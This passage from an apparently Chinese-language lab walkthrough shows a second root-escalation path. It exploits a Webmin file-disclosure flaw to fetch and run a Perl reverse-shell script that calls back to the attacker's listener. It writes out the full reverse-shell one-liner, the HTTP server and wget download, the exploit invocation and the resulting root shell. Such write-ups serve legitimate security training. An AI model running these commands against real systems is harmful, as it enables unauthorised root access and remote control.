keys
firefart@ubuntuvm:~# cd keys
firefart@ubuntuvm:~/keys# ls
firefart@ubuntuvm:~/keys# ls -al
total 8
drwxr-xr-x 2 firefart root 4096 2008-06-12 13:18 .
drwxr-xr-x 4 firefart root 4096 2008-06-12 13:18 ..
firefart@ubuntuvm:~/keys#
提权2
webmin文件泄露漏洞利用
我们也可以利用webmin文件泄露漏洞,因为这个漏洞可以使用root权限执行、查看文件等。那么我们只需要上传一个pel反弹木马,再以root权限运行,kali开启监听就可以反弹到shell了!而且是root权限!
exp
┌──(root㉿ru)-[~/kali]
└─# cat shell.cgi
perl -e 'use Socket;$i="192.168.16.128";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
┌──(root㉿ru)-[~/kali]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.16.140 - - [11/Dec/2023 09:48:05] "GET /shell.cgi HTTP/1.0" 200 -
vmware@ubuntuvm:/tmp$ wget http://192.168.16.128/shell.cgi
--13:28:44-- http://192.168.16.128/shell.cgi
=> `shell.cgi'
Connecting to 192.168.16.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 219 [application/octet-stream]
100%[====================================>] 219 --.--K/s
13:28:44 (70.65 MB/s) - `shell.cgi' saved [219/219]
vmware@ubuntuvm:/tmp$ ls
dirty dirty.c passwd.bak shell.cgi sqllS3Hev
vmware@ubuntuvm:/tmp$ chmod +x shell.cgi
vmware@ubuntuvm:/tmp$ ls
dirty dirty.c passwd.bak shell.cgi sqllS3Hev
vmware@ubuntuvm:/tmp$
┌──(root㉿ru)-[~/kali]
└─# perl 2017.pl 192.168.16.140 10000 /tmp/shell.cgi 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.16.140 on port 10000!
FILENAME: /tmp/shell.cgi
┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.16.140: inverse host lookup failed: Unknown host
connect to [192.168.16.128] from (UNKNOWN) [192.168.16.140] 35243
sh: can't access tty; job control turned off
# id
uid=0(firefart) gid=0(root)
# cd /root
# pwd
/root
# ls
keys
1112
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
